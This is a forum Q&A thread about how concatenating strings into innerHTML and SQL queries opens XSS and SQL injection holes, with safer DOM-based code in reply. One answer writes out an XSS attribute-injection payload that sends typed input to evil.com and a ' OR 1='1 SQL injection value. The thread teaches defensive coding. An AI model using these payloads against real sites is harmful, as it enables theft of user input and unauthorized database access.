I was told recently (on here) that concatenating your Javascript will cause XSS vulnerabilities. I have done my research on here and on google to find out why this bad, but I am not seeing it.
Part 1 - Javascript: Apparently something like this is the unsafe way. Why? How should you do it instead?
// part of a script dynamically making table rows
var el = document.createElement('div');
el.innerHTML = '<input type="text" id="myId'+id+'" />';
cellOne.appendChild(el);
Part 2 - MySQL: I was told that you when you concat SQL, it exposes you to SQL injections. I am not sure what they meant by concat SQL exactly. I assume they were not talking about the SQL concat function. I am guessing they meant:
$sql = " SELECT `col` FROM `table` WHERE `col` = '".$myFilteredVariable."' ";
Or maybe?
$sql = " SELECT `col` FROM `table` WHERE `col` = '".$myFilteredVariable."' ";
$sql .= " AND `col2` = '".$myvar.'";
Does this expose you to SQL injection?
The SQL part is academic. I use PDO to prevent SQL injection.
It can be, if id comes from user input that persists on the page.
The id variable may contain...
" onchange="(new Image).src='http://evil.com/user-input=' + this.value;" bla="
Unless those variables are escaped using the correct mechanism, there is a vulnerability.
The $myvar variable may contain...
' OR 1='1
How would you do it instead :
var el = document.createElement('div');
var input = document.createElement("input");
input.type = 'text';
input.id = 'myId' + id;
el.appendChild(input);
cellOne.appendChild(el);
Note this is safer because .id cannot inject arbitary html
For more information about XSS attack vectors I recommend reading OWASP xss article
It's a concatenation question, not a question of xss or sql injection.
Nothing wrong with concatenation itself. It is pretty safe operation.